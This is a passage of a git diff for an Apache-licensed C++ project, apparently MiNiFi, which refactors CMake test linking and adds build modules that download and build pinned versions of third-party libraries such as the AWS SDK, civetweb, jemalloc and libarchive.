+### Interface libraries
+[Interface libraries](https://cmake.org/cmake/help/v3.2/manual/cmake-buildsystem.7.html#interface-libraries) can be used to create targets from header-only libraries and use them the same way as any other library target.
+
+Header-only third party libraries are placed in the the `thirdparty` directory and an interface library target is created from them.
+
+Example:
+```
+add_library(foo INTERFACE)
+target_include_directories(foo INTERFACE "${CMAKE_CURRENT_SOURCE_DIR}/thirdparty/libfoo-1.0.0")
+```
diff --git a/cmake/BuildTests.cmake b/cmake/BuildTests.cmake
index db8aa67..8779d86 100644
--- a/cmake/BuildTests.cmake
+++ b/cmake/BuildTests.cmake
@@ -37,9 +37,6 @@
 
 function(appendIncludes testName)
     target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/catch")
-    target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/cron")
-    target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/spdlog-20170710/include")
-    target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/yaml-cpp-yaml-cpp-0.5.3/include")
     target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/include")
     target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/")
     target_include_directories(${testName} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/c2/protocols")
@@ -74,17 +71,10 @@
     if (Boost_FOUND)
         target_include_directories(${testName} BEFORE PRIVATE "${Boost_INCLUDE_DIRS}")
     endif()
-    target_link_libraries(${testName} ${CMAKE_DL_LIBS} ${SPD_LIB} ${TEST_BASE_LIB})
-    target_link_libraries(${testName} ${CMAKE_THREAD_LIBS_INIT}  core-minifi yaml-cpp)
+    target_link_libraries(${testName} ${CMAKE_DL_LIBS} ${TEST_BASE_LIB})
+    target_link_libraries(${testName} ${CMAKE_THREAD_LIBS_INIT} core-minifi yaml-cpp spdlog)
     if (NOT excludeBase)
-      if (APPLE)
-  		target_link_libraries (${testName} -Wl,-all_load minifi)
-	  elseif(WIN32)
-	    target_link_libraries (${testName} minifi)
-	    set_target_properties(${testName} PROPERTIES LINK_FLAGS "${LINK_FLAGS} /WHOLEARCHIVE:minifi")
-	  else ()
-  		target_link_libraries (${testName} -Wl,--whole-archive minifi -Wl,--no-whole-archive)
-	  endif ()
+      target_wholearchive_library(${testName} minifi)
 	endif()
 	add_dependencies(${testName} minifiexe nanofi)
     if (Boost_FOUND)
@@ -95,16 +85,11 @@
 
 enable_testing(test)
 
-SET(SPD_LIB spd_lib)
-add_library(${SPD_LIB} STATIC ${SPD_SOURCES})
-
 SET(TEST_BASE_LIB test_base)
 add_library(${TEST_BASE_LIB} STATIC "${TEST_DIR}/TestBase.cpp" "${TEST_DIR}/RandomServerSocket.cpp" "${TEST_DIR}/KamikazeProcessor.cpp")
+target_link_libraries(${TEST_BASE_LIB} core-minifi)
 target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/catch")
 target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/include/")
-target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/cron")
-target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/thirdparty/spdlog-20170710/include")
-target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CIVET_THIRDPARTY_ROOT}/include")
 if(WIN32)
    	target_include_directories(${TEST_BASE_LIB} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/opsys/win")
 else()
@@ -143,21 +128,9 @@
     target_include_directories(${testfilename} BEFORE PRIVATE "${CMAKE_SOURCE_DIR}/libminifi/test")
     appendIncludes("${testfilename}")
     target_link_libraries(${testfilename} ${CMAKE_THREAD_LIBS_INIT} ${CATCH_MAIN_LIB} ${TEST_BASE_LIB}  nanofi)
-    
-    if (APPLE)
-    	# minifi-standard-processors
-	target_link_libraries (${testfilename} -Wl,-all_load minifi-standard-processors nanofi)
-    elseif(NOT WIN32)
-	target_link_libraries (${testfilename} -Wl,--whole-archive minifi-standard-processors -Wl,--no-whole-archive)
-    else()
-	set(WIN32_ARCHIVES "${WIN32_ARCHIVES} /WHOLEARCHIVE:minifi-standard-processors")
-	target_link_libraries (${testfilename} minifi-standard-processors)
-    endif ()
-	
-    if(WIN32)
-	set_target_properties(${testfilename} PROPERTIES LINK_FLAGS "${WIN32_ARCHIVES}")
-    endif()
-    
+
+    target_wholearchive_library(${testfilename} minifi-standard-processors)
+
     MATH(EXPR UNIT_TEST_COUNT "${UNIT_TEST_COUNT}+1")
     add_test(NAME "${testfilename}" COMMAND "${testfilename}" WORKING_DIRECTORY ${TEST_DIR})
 ENDFOREACH()
diff --git a/cmake/BundledAwsSdkCpp.cmake b/cmake/BundledAwsSdkCpp.cmake
new file mode 100644
index 0000000..4690c61
--- /dev/null
+++ b/cmake/BundledAwsSdkCpp.cmake
@@ -0,0 +1,178 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_libaws SOURCE_DIR BINARY_DIR)
+    # Define byproducts
+    if (WIN32)
+        set(SUFFIX "lib")
+    else()
+        set(SUFFIX "a")
+    endif()
+    set(BYPRODUCTS
+            "lib/libaws-cpp-sdk-core.${SUFFIX}"
+            "lib/libaws-cpp-sdk-s3.${SUFFIX}")
+
+    FOREACH(BYPRODUCT ${BYPRODUCTS})
+        LIST(APPEND AWSSDK_LIBRARIES_LIST "${BINARY_DIR}/thirdparty/libaws-install/${BYPRODUCT}")
+    ENDFOREACH(BYPRODUCT)
+
+    # Set build options
+    set(AWS_C_COMMON_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            -DCMAKE_PREFIX_PATH=${BINARY_DIR}/thirdparty/libaws-install
+            -DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libaws-install
+            -DENABLE_TESTING=OFF
+            -DBUILD_SHARED_LIBS=OFF)
+
+    append_third_party_passthrough_args(AWS_C_COMMON_CMAKE_ARGS "${AWS_C_COMMON_CMAKE_ARGS}")
+
+    set(AWS_CHECKSUM_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            -DCMAKE_PREFIX_PATH=${BINARY_DIR}/thirdparty/libaws-install
+            -DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libaws-install
+            -DBUILD_SHARED_LIBS=OFF)
+
+    append_third_party_passthrough_args(AWS_CHECKSUM_CMAKE_ARGS "${AWS_CHECKSUM_CMAKE_ARGS}")
+
+    set(AWS_C_EVENT_STREAM_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            -DCMAKE_PREFIX_PATH=${BINARY_DIR}/thirdparty/libaws-install
+            -DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libaws-install
+            -DBUILD_SHARED_LIBS=OFF)
+
+    append_third_party_passthrough_args(AWS_C_EVENT_STREAM_CMAKE_ARGS "${AWS_C_EVENT_STREAM_CMAKE_ARGS}")
+
+    set(AWS_SDK_CPP_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            -DCMAKE_PREFIX_PATH=${BINARY_DIR}/thirdparty/libaws-install
+            -DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libaws-install
+            -DBUILD_ONLY=s3
+            -DENABLE_TESTING=OFF
+            -DBUILD_SHARED_LIBS=OFF
+            -DENABLE_UNITY_BUILD=ON
+            -DBUILD_DEPS=OFF)
+
+    append_third_party_passthrough_args(AWS_SDK_CPP_CMAKE_ARGS "${AWS_SDK_CPP_CMAKE_ARGS}")
+
+    # Build project
+    ExternalProject_Add(
+            aws-c-common-external
+            GIT_REPOSITORY "https://github.com/awslabs/aws-c-common.git"
+            GIT_TAG "ac02e1728d740bb9106b6ea727cd3378f8ea438a"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/aws-c-common-src"
+            INSTALL_DIR "${BINARY_DIR}/thirdparty/libaws-install"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${AWS_C_COMMON_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-common.${SUFFIX}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+    ExternalProject_Add(
+            aws-checksum-external
+            GIT_REPOSITORY "https://github.com/awslabs/aws-checksums.git"
+            GIT_TAG "41dc36d14b0898bd34e3f91c808fcb00f5e21875"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/aws-checksums-src"
+            INSTALL_DIR "${BINARY_DIR}/thirdparty/libaws-install"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${AWS_CHECKSUM_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-checksums.${SUFFIX}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+    ExternalProject_Add(
+            aws-c-event-stream-external
+            GIT_REPOSITORY "https://github.com/awslabs/aws-c-event-stream.git"
+            GIT_TAG "97ab2e57e83ad114679dbee0dcfb5048640debe7"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/aws-c-event-stream-src"
+            INSTALL_DIR "${BINARY_DIR}/thirdparty/libaws-install"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${AWS_C_EVENT_STREAM_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-event-stream.${SUFFIX}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+    ExternalProject_Add(
+            aws-sdk-cpp-external
+            GIT_REPOSITORY "https://github.com/aws/aws-sdk-cpp.git"
+            GIT_TAG "1.7.109"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/aws-sdk-cpp-src"
+            INSTALL_DIR "${BINARY_DIR}/thirdparty/libaws-install"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${AWS_SDK_CPP_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${AWSSDK_LIBRARIES_LIST}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set dependencies
+    add_dependencies(aws-c-common-external CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    add_dependencies(aws-checksum-external CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    add_dependencies(aws-c-event-stream-external CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    add_dependencies(aws-c-event-stream-external aws-c-common-external aws-checksum-external)
+    add_dependencies(aws-sdk-cpp-external CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    add_dependencies(aws-sdk-cpp-external aws-c-event-stream-external aws-c-common-external aws-checksum-external)
+
+    # Set variables
+    set(LIBAWS_FOUND "YES" CACHE STRING "" FORCE)
+    set(LIBAWS_INCLUDE_DIR "${BINARY_DIR}/thirdparty/libaws-install/include" CACHE STRING "" FORCE)
+    set(LIBAWS_LIBRARIES
+            ${AWSSDK_LIBRARIES_LIST}
+            "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-event-stream.${SUFFIX}"
+            "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-common.${SUFFIX}"
+            "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-checksums.${SUFFIX}"
+            CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${LIBAWS_INCLUDE_DIR})
+
+    add_library(AWS::aws-c-common STATIC IMPORTED)
+    set_target_properties(AWS::aws-c-common PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-common.${SUFFIX}")
+    add_dependencies(AWS::aws-c-common aws-c-common-external)
+    set_property(TARGET AWS::aws-c-common APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
+    set_property(TARGET AWS::aws-c-common APPEND PROPERTY INTERFACE_LINK_LIBRARIES CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    if (APPLE)
+        set_property(TARGET AWS::aws-c-common APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
+    endif()
+
+    add_library(AWS::aws-checksums STATIC IMPORTED)
+    set_target_properties(AWS::aws-checksums PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-checksums.${SUFFIX}")
+    add_dependencies(AWS::aws-checksums aws-checksums-external)
+    set_property(TARGET AWS::aws-checksums APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
+    set_property(TARGET AWS::aws-checksums APPEND PROPERTY INTERFACE_LINK_LIBRARIES CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    if (APPLE)
+        set_property(TARGET AWS::aws-checksums APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
+    endif()
+
+    add_library(AWS::aws-c-event-stream STATIC IMPORTED)
+    set_target_properties(AWS::aws-c-event-stream PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-c-event-stream.${SUFFIX}")
+    add_dependencies(AWS::aws-c-event-stream aws-c-event-stream-external)
+    set_property(TARGET AWS::aws-c-event-stream APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
+    set_property(TARGET AWS::aws-c-event-stream APPEND PROPERTY INTERFACE_LINK_LIBRARIES AWS::aws-c-common AWS::aws-checksums CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    if (APPLE)
+        set_property(TARGET AWS::aws-c-event-stream APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
+    endif()
+
+    add_library(AWS::aws-cpp-sdk-core STATIC IMPORTED)
+    set_target_properties(AWS::aws-cpp-sdk-core PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-cpp-sdk-core.${SUFFIX}")
+    add_dependencies(AWS::aws-cpp-sdk-core aws-sdk-cpp-external)
+    set_property(TARGET AWS::aws-cpp-sdk-core APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
+    set_property(TARGET AWS::aws-cpp-sdk-core APPEND PROPERTY INTERFACE_LINK_LIBRARIES AWS::aws-c-event-stream AWS::aws-c-common AWS::aws-checksums CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    if (APPLE)
+        set_property(TARGET AWS::aws-cpp-sdk-core APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
+    endif()
+
+    add_library(AWS::aws-cpp-sdk-s3 STATIC IMPORTED)
+    set_target_properties(AWS::aws-cpp-sdk-s3 PROPERTIES IMPORTED_LOCATION "${BINARY_DIR}/thirdparty/libaws-install/lib/libaws-cpp-sdk-s3.${SUFFIX}")
+    add_dependencies(AWS::aws-cpp-sdk-s3 aws-sdk-cpp-external)
+    set_property(TARGET AWS::aws-cpp-sdk-s3 APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${LIBAWS_INCLUDE_DIR})
+    set_property(TARGET AWS::aws-cpp-sdk-s3 APPEND PROPERTY INTERFACE_LINK_LIBRARIES CURL::libcurl OpenSSL::Crypto OpenSSL::SSL ZLIB::ZLIB)
+    if (APPLE)
+        set_property(TARGET AWS::aws-cpp-sdk-s3 APPEND PROPERTY INTERFACE_LINK_LIBRARIES "-framework CoreFoundation")
+    endif()
+endfunction(use_bundled_libaws)
diff --git a/cmake/BundledBustache.cmake b/cmake/BundledBustache.cmake
new file mode 100644
index 0000000..4ee1804
--- /dev/null
+++ b/cmake/BundledBustache.cmake
@@ -0,0 +1,59 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_bustache SOURCE_DIR BINARY_DIR)
+    # Find Boost
+    find_package(Boost COMPONENTS system filesystem iostreams REQUIRED)
+
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT "lib/bustache.lib")
+    else()
+        set(BYPRODUCT "lib/libbustache.a")
+    endif()
+
+    # Set build options
+    set(BUSTACHE_BYPRODUCT_DIR "${CMAKE_CURRENT_BINARY_DIR}/thirdparty/bustache-install")
+
+    set(BUSTACHE_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BUSTACHE_BYPRODUCT_DIR}"
+            "-DBUSTACHE_ENABLE_TESTING=OFF")
+
+    # Build project
+    ExternalProject_Add(
+            bustache-external
+            GIT "https://github.com/jamboree/bustache.git"
+            GIT_TAG "42dee8ef9bbcae7e9a33500a116cfd9c314662d6"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/bustache-src"
+            CMAKE_ARGS ${BUSTACHE_CMAKE_ARGS}
+            BUILD_BYPRODUCTS "${BUSTACHE_BYPRODUCT_DIR}/${BYPRODUCT}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(BUSTACHE_FOUND "YES" CACHE STRING "" FORCE)
+    set(BUSTACHE_INCLUDE_DIR "${BUSTACHE_BYPRODUCT_DIR}/include" CACHE STRING "" FORCE)
+    set(BUSTACHE_LIBRARY "${BUSTACHE_BYPRODUCT_DIR}/${BYPRODUCT}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(BUSTACHE::libbustache STATIC IMPORTED)
+    set_target_properties(BUSTACHE::libbustache PROPERTIES IMPORTED_LOCATION "${BUSTACHE_LIBRARY}")
+    add_dependencies(BUSTACHE::libbustache bustache-external)
+    file(MAKE_DIRECTORY ${BUSTACHE_INCLUDE_DIR})
+    set_property(TARGET BUSTACHE::libbustache APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${BUSTACHE_INCLUDE_DIR} ${Boost_INCLUDE_DIRS})
+    set_property(TARGET BUSTACHE::libbustache APPEND PROPERTY INTERFACE_LINK_LIBRARIES ${Boost_LIBRARIES})
+endfunction(use_bundled_bustache)
diff --git a/cmake/BundledCivetWeb.cmake b/cmake/BundledCivetWeb.cmake
new file mode 100644
index 0000000..f5b7e11
--- /dev/null
+++ b/cmake/BundledCivetWeb.cmake
@@ -0,0 +1,101 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_civetweb SOURCE_DIR BINARY_DIR)
+    message("Using bundled civetweb")
+
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/civetweb/civetweb.patch")
+
+    # Define byproducts
+    if (WIN32)
+        set(SUFFIX "lib")
+    else()
+		set(PREFIX "lib")
+        set(SUFFIX "a")
+    endif()
+
+    set(BYPRODUCTS
+            "lib/${PREFIX}civetweb.${SUFFIX}"
+            "lib/${PREFIX}civetweb-cpp.${SUFFIX}"
+            )
+
+    set(CIVETWEB_BIN_DIR "${BINARY_DIR}/thirdparty/civetweb-install/" CACHE STRING "" FORCE)
+
+    FOREACH(BYPRODUCT ${BYPRODUCTS})
+        LIST(APPEND CIVETWEB_LIBRARIES_LIST "${CIVETWEB_BIN_DIR}/${BYPRODUCT}")
+    ENDFOREACH(BYPRODUCT)
+
+    # Set build options
+    set(CIVETWEB_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${CIVETWEB_BIN_DIR}"
+            -DCMAKE_POSITION_INDEPENDENT_CODE=ON
+            -DCIVETWEB_ENABLE_SSL_DYNAMIC_LOADING=OFF
+            -DCIVETWEB_ENABLE_CXX=ON
+            -DBUILD_TESTING=OFF
+            -DCIVETWEB_ALLOW_WARNINGS=ON
+            -DCIVETWEB_ENABLE_ASAN=OFF # TODO
+            )
+    if (OPENSSL_OFF)
+        list(APPEND CIVETWEB_CMAKE_ARGS -DCIVETWEB_ENABLE_SSL=OFF)
+    endif()
+
+    append_third_party_passthrough_args(CIVETWEB_CMAKE_ARGS "${CIVETWEB_CMAKE_ARGS}")
+
+    # Build project
+    ExternalProject_Add(
+            civetweb-external
+            URL "https://github.com/civetweb/civetweb/archive/v1.10.tar.gz"
+            URL_HASH "SHA256=e6958f005aa01b02645bd3ff9760dd085e83d30530cdd97b584632419195bea5"
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/civetweb-src"
+            LIST_SEPARATOR % # This is needed for passing semicolon-separated lists
+            CMAKE_ARGS ${CIVETWEB_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${CIVETWEB_LIBRARIES_LIST}"
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set dependencies
+    if (NOT OPENSSL_OFF)
+        add_dependencies(civetweb-external OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+
+    # Set variables
+    set(CIVETWEB_FOUND "YES" CACHE STRING "" FORCE)
+    set(CIVETWEB_INCLUDE_DIR "${CIVETWEB_BIN_DIR}/include" CACHE STRING "" FORCE)
+    set(CIVETWEB_LIBRARIES "${CIVETWEB_BIN_DIR}/lib/${PREFIX}civetweb.${SUFFIX}" "${CIVETWEB_BIN_DIR}/lib/${PREFIX}civetweb-cpp.${SUFFIX}" CACHE STRING "" FORCE)
+
+    # Set exported variables for FindPackage.cmake
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_CIVETWEB_INCLUDE_DIR=${CIVETWEB_INCLUDE_DIR}" CACHE STRING "" FORCE)
+    set(PASSTHROUGH_VARIABLES ${PASSTHROUGH_VARIABLES} "-DEXPORTED_CIVETWEB_LIBRARIES=${CIVETWEB_LIBRARIES}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    file(MAKE_DIRECTORY ${CIVETWEB_INCLUDE_DIR})
+
+    add_library(CIVETWEB::c-library STATIC IMPORTED)
+    set_target_properties(CIVETWEB::c-library PROPERTIES IMPORTED_LOCATION "${CIVETWEB_BIN_DIR}/lib/${PREFIX}civetweb.${SUFFIX}")
+    set_property(TARGET CIVETWEB::c-library APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${CIVETWEB_INCLUDE_DIR})
+    add_dependencies(CIVETWEB::c-library civetweb-external)
+    if (NOT OPENSSL_OFF)
+        set_property(TARGET CIVETWEB::c-library APPEND PROPERTY INTERFACE_LINK_LIBRARIES OpenSSL::SSL OpenSSL::Crypto)
+    endif()
+
+    add_library(CIVETWEB::civetweb-cpp STATIC IMPORTED)
+    set_target_properties(CIVETWEB::civetweb-cpp PROPERTIES IMPORTED_LOCATION "${CIVETWEB_BIN_DIR}/lib/${PREFIX}civetweb-cpp.${SUFFIX}")
+    set_property(TARGET CIVETWEB::civetweb-cpp APPEND PROPERTY INTERFACE_LINK_LIBRARIES CIVETWEB::c-library)
+    add_dependencies(CIVETWEB::civetweb-cpp civetweb-external)
+endfunction(use_bundled_civetweb)
diff --git a/cmake/BundledJemalloc.cmake b/cmake/BundledJemalloc.cmake
new file mode 100644
index 0000000..c4bdfc8
--- /dev/null
+++ b/cmake/BundledJemalloc.cmake
@@ -0,0 +1,55 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_jemalloc SOURCE_DIR BINARY_DIR)
+    message("Using bundled jemalloc")
+
+    # Define byproducts
+    set(BYPRODUCT "lib/libjemalloc.a")
+
+    # Build project
+    ExternalProject_Add(
+            jemalloc-external
+            GIT_REPOSITORY "https://github.com/jemalloc/jemalloc.git"
+            GIT_TAG "5.1.0"
+            PREFIX "${BINARY_DIR}/thirdparty/jemalloc"
+            BUILD_IN_SOURCE true
+            SOURCE_DIR "${BINARY_DIR}/thirdparty/jemalloc-src"
+            BUILD_COMMAND make
+            CMAKE_COMMAND ""
+            UPDATE_COMMAND ""
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/jemalloc-src/${BYPRODUCT}"
+            INSTALL_COMMAND ${CMAKE_COMMAND} -E echo "Skipping install step."
+            CONFIGURE_COMMAND ""
+            PATCH_COMMAND ./autogen.sh && ./configure
+            STEP_TARGETS build
+            EXCLUDE_FROM_ALL TRUE
+    )
+
+    # Set variables
+    set(JEMALLOC_FOUND "YES" CACHE STRING "" FORCE)
+    set(JEMALLOC_INCLUDE_DIRS "${BINARY_DIR}/thirdparty/jemalloc-src/include" CACHE STRING "" FORCE)
+    set(JEMALLOC_LIBRARY "${BINARY_DIR}/thirdparty/jemalloc-src/${BYPRODUCT}" CACHE STRING "" FORCE)
+    set(JEMALLOC_LIBRARIES "${JEMALLOC_LIBRARY}" CACHE STRING "" FORCE)
+
+    # Create imported targets
+    add_library(JeMalloc::JeMalloc STATIC IMPORTED)
+    set_target_properties(JeMalloc::JeMalloc PROPERTIES IMPORTED_LOCATION "${JEMALLOC_LIBRARY}")
+    add_dependencies(JeMalloc::JeMalloc jemalloc-external)
+    file(MAKE_DIRECTORY ${JEMALLOC_INCLUDE_DIRS})
+    set_property(TARGET JeMalloc::JeMalloc APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES ${JEMALLOC_INCLUDE_DIRS})
+endfunction(use_bundled_jemalloc)
diff --git a/cmake/BundledLibArchive.cmake b/cmake/BundledLibArchive.cmake
new file mode 100644
index 0000000..815b9b1
--- /dev/null
+++ b/cmake/BundledLibArchive.cmake
@@ -0,0 +1,62 @@
+# Licensed to the Apache Software Foundation (ASF) under one
+# or more contributor license agreements.  See the NOTICE file
+# distributed with this work for additional information
+# regarding copyright ownership.  The ASF licenses this file
+# to you under the Apache License, Version 2.0 (the
+# "License"); you may not use this file except in compliance
+# with the License.  You may obtain a copy of the License at
+#
+#   http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing,
+# software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+# KIND, either express or implied.  See the License for the
+# specific language governing permissions and limitations
+# under the License.
+
+function(use_bundled_libarchive SOURCE_DIR BINARY_DIR)
+    # Define patch step
+    set(PC "${Patch_EXECUTABLE}" -p1 -i "${SOURCE_DIR}/thirdparty/libarchive/libarchive.patch")
+
+    # Define byproducts
+    if (WIN32)
+        set(BYPRODUCT "lib/libarchive.lib")
+    else()
+        set(BYPRODUCT "lib/libarchive.a")
+    endif()
+
+    # Set build options
+    set(LIBARCHIVE_CMAKE_ARGS ${PASSTHROUGH_CMAKE_ARGS}
+            "-DCMAKE_INSTALL_PREFIX=${BINARY_DIR}/thirdparty/libarchive-install"
+            -DENABLE_NETTLE=FALSE
+            -DENABLE_OPENSSL=FALSE
+            -DENABLE_TAR=FALSE
+            -DENABLE_CPIO=FALSE
+            -DENABLE_TEST=FALSE)
+
+    # Build project
+    ExternalProject_Add(
+            libarchive-external
+            URL "https://www.libarchive.org/downloads/libarchive-3.3.2.tar.gz"
+            URL_HASH "SHA256=ed2dbd6954792b2c054ccf8ec4b330a54b85904a80cef477a1c74643ddafa0ce"
+            SOURCE_DIR "${SOURCE_DIR}/thirdparty/libarchive-src"
+            CMAKE_ARGS ${LIBARCHIVE_CMAKE_ARGS}
+            PATCH_COMMAND ${PC}
+            BUILD_BYPRODUCTS "${BINARY_DIR}/thirdparty/libarchive-install/${BYPRODUCT}"
